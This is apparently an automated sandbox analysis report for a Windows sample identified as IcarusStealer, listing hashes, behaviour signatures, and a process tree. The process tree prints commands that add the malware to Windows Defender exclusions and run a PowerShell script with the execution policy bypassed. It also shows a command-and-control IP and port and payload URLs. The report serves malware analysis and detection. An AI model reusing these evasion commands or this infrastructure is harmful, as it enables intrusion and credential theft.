Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
55s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
08/03/2024, 21:02
Static task
static1
Behavioral task
behavioral1
Sample
Lol.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Lol.exe
Resource
win10v2004-20240226-en
General
-
Target
Lol.exe
-
Size
494KB
-
MD5
02d13710a5a788759319df4d64b95c17
-
SHA1
166121845fb2f40cc9febc35dea432696e388bec
-
SHA256
5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33
-
SHA512
0a0a9c7ef30d0d3e71141684e796cfc78eb9d4689e37ae6d66123dfdd8a12df55dd424c47cd1d75068c6b8ff16512da2d607b69a6bc6cbcfba01b8063311171c
-
SSDEEP
12288:zhGwluLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QY:VBZ6N6LqQzJqk/
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 1 IoCs
pid Process 2884 SMSHoists.exe -
Loads dropped DLL 1 IoCs
pid Process 2152 cmd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2104 set thread context of 3052 2104 Lol.exe 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 240 powershell.exe 2960 powershell.exe 1652 powershell.exe 3052 cvtres.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2848 chrome.exe 2848 chrome.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2064 explorer.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeDebugPrivilege 3052 cvtres.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 2884 SMSHoists.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe -
Suspicious use of SendNotifyMessage 49 IoCs
pid Process 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2064 wrote to memory of 2568 2064 explorer.exe 31 PID 2064 wrote to memory of 2568 2064 explorer.exe 31 PID 2064 wrote to memory of 2568 2064 explorer.exe 31 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lol.exe"C:\Users\Admin\AppData\Local\Temp\Lol.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2848 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2be9758,0x7fef2be9768,0x7fef2be97784⤵PID:2352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1096 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:24⤵PID:1684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:84⤵PID:2304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:84⤵PID:1284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1508 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:14⤵PID:2932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2208 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:14⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:24⤵PID:2836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2912 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:14⤵PID:1636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:84⤵PID:1536
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.17 22817 vUiuCXqqM2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps13⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tk3xlwcg.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F10.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7F0F.tmp"6⤵PID:1144
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zn4wkeoe\zn4wkeoe.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA479.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEEC8F2D35ADF4DE88FDAC032FE13CFB9.TMP"4⤵PID:740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe & exit3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\SMSHoists.exeC:\Users\Admin\AppData\Local\Temp\SMSHoists.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"3⤵PID:1904
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"3⤵PID:2604
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2272
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
5KB
MD5ad6118e0114b2a0deb1d4717f01be83c
SHA107e2df41318278462e1e2ae356309d37938b3f9f
SHA2561f2c808fdb63876bc6c78bf54a10eaaf57321f720a009c827a5b33d72ec4397a
SHA5128a935b1b7985a4338a8c65a6b5381dadaeedb089d0e45ef281a40607fa629a4b4ebe65bba5bc345ce68d882b6cff8725f3ef30b09d5aeb7e5f6dbdafcf8c5f2e
-
Filesize
5KB
MD5ac98c90f1a59ba3bbec4f002091ac46e
SHA1e5f890c019ceba4dd54b8060414871f097cd0e92
SHA2562a2b31d1bbdc47a21ee9ac2f91a702ff069263ec46f2ad2f2d84e579a9725fa3
SHA5126d356b53d2b2099e289a65869dd125d116d6d331e8cd4858526c668808a4b49c6f22e04b52aed18869161baeb802886ae5e0995973dd0a7db89a36f0efd78923
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
1KB
MD55c76c70f9e2bf4fca8e7e1d0948752d1
SHA15f3ed12cfa011601eedb8de56cf88746a4ed8786
SHA256aa6845e9bf97983457a14b399f7c5e0cc41f7d3cdb090b93907bcc218e63c2df
SHA512e7f30a7c4c9717f10b139087450194425fbb8e382993eebe014035944d5fe1f592590e763d196b8fb079b1363824ebd950c07b2fa179422c3f2f10e3e3fb0040
-
Filesize
1KB
MD5d13d87468fc17f61c07c6daad181d202
SHA18bc6cb949e5e681915de4367cccc6e5651147929
SHA2563311a8d968b65943e5221c3114c110cf65bc24adb993d0f0560e384b11836c22
SHA512465fb56649b318846ff155107053363718260e367a5f9ebc176b13a9f98ed93e88705eb0292f495d7ae52b1b0a612929df9f64da49e0fd2dd926916da90a74bc
-
Filesize
4KB
MD59b83df4cfccc8a51f411cb8f1d69e0de
SHA187e0a21050847031c4b35714374e29b61164c016
SHA256828e9ec5e13e98fb331c7c5fbd07db76de1b47eee619985484e8ea1032604613
SHA51232ff7486082484c13dd3a142972b0872c1ce266b4ce7ce82e7cd0729e12ac502a9cc080633c0192f9d5745a2270aef07507ffe3d82140cc658539f5023052886
-
Filesize
584B
MD55957e298325fe672f062f0607e67611d
SHA139b8b3d28a1c4ef5306e207de9b8b08197c60f79
SHA256a10479eea5f9d85ac00db77c0e090de2db64cdb163055e7b42fbcb2c97a66898
SHA51285f5ee03ae0c555ef5d51d2026f2532cc8155b73f75e91ac4ed727abf4578a8b065a3b053ca071ac67eb739cadab1e0e994676c4effa6198b9c536ce5c91e7bf
-
Filesize
3KB
MD54d5d612516d0dfdc2df500336cfb83f3
SHA1997b33e97227c11722752864f93d4ea7412f24e8
SHA2562a287e624de01be196d8232543b2b5a2504723d8c927c4953439bef3c3044fe2
SHA5126ac68a497b65041683d98b606f09a6ecbb3fc9500da7909e7dc4ee101e471484b2054bd762dc28959c2d2ea3140d107daf4a6ad1c1555518277ea6dae6b682e5
-
Filesize
7KB
MD58d06ebaa530f1ed1ecd3cb090f03ffbb
SHA10410c21facad5649b482e1c650e001b83d47091f
SHA256af21d1636ebdb55c32fc17225f90c35287165f1586ac7d80975e201296988010
SHA512f3a37f37538f108ae0183ce6adb2e6c30e3b649cf897df83fe33254b3123d5df302cca5c9be4191ca0bcd603ccfc057a74ccac4da1f6624c272e6faa0de7d0eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f053d60cf50024668cfa584474080975
SHA1dc481edbfec92779639e509cbc2dac6f43174a06
SHA2568965e4c35ce388f43cd61ba4b1e60e96c9d367207d42eb0971a21b245a333f4c
SHA512fc5e648e47e674110b278222996a987a5808d7e71ea3a12f931209966b07fa3e9384d1eecca6cc3c17308b9a5ef3a576308000998152e0302eee552db1a88767
-
Filesize
652B
MD566eee1a2269e2b46ca06fd1419ece5c1
SHA1e0d590230bfc5ae50b06d905352002412b9eaa24
SHA2564fb99a9b8f1a9efa94074ec59cbf7633903429474666d49dac51aa821822a930
SHA5125533917fa1fc883af00ccbe84a125cda2eb55392406fcf79d0b6af5724ff4f2b08ed53be79c444352e9a21da7a7b053c5ffcf81c51dbd804fbf32c86d5ab130e
-
Filesize
1KB
MD5be7ee5c1b32c4c11ab8d5855c0a674a2
SHA14b1459595dd3e98efc33d5b17d0d57ab07e181bc
SHA2566b3182ccdb0009b1f400d59a30915bf72319b0969a6717460af9cd1d940f5bef
SHA51261be4353f0ef7c67513e0c93a22de404f897ee83a519e2d9c352cb3d4ba584d236bf99476b64238d15f1bbdef22c333cb0f8e75255d6cc8756739c928ecf131e
-
Filesize
380B
MD516ec6a1216a8b82d7bc3d0b0b4847f1d
SHA1874a97587db13e8d55bdfcc5ef69681c759549ca
SHA2560717362217b55ae4b8ed86790fcae2997f7dcb9d931e687566960b54297adf1e
SHA512234e9052025e789468b08ed3c01d164afc6be21f9fb6c4fdf759fda611b5ed02a16d01dfbd0213eeca63492abd3e945704d50264f04538694487cd2b5dd121b6
-
Filesize
309B
MD54332aa88f1299d5ef9a3651038481cbf
SHA1ccd119d8a9994e560aa9ca344b46c34a035719a2
SHA25668e460b23d2f7519a19ec204c02e34a515206f895fb882fb2d30d981a2ecbd96
SHA5128b5901b764d71d936a79d06175cd2fc2c6e0a2b00a9506b754630f6fc57a76e9518781d49f92c0ddcd1e16970cb8ee4332d071dd39381a4becfa8188129abeb6
-
Filesize
1KB
MD599e19d86ac0d1a7c824b4f95eb85a09c
SHA1f942d4b0e891b6c7e37f76a98c8f06f0e87b0dbb
SHA256d0b7f831c8935682f52aebbcfa631d97715b83e1267cb2b7bf71533942945863
SHA512698bdd2a512f498fff28a6a55561919f2cb13847e757408b87aa53f8efaccb13d1bf171e2192298f487217b71a9312af377276f33ddd92ee9952924eadcbc049
-
Filesize
451B
MD55d8b2653c2f9451968c92d7f50cec261
SHA1b0d33a3d68346c3d3db7fef8478f9cf37ee7bc70
SHA2564008648fa453181d1a65c10e48167170a47bc412271e33f027edf034884a7738
SHA512ccef5bd3bc86c5be105dcdf8cb058a572e7a76f394cff461847e7f858240f12a033478dd7af24c44946ff41045343a01d5d3b3cda1b05540fa6a3038f58447be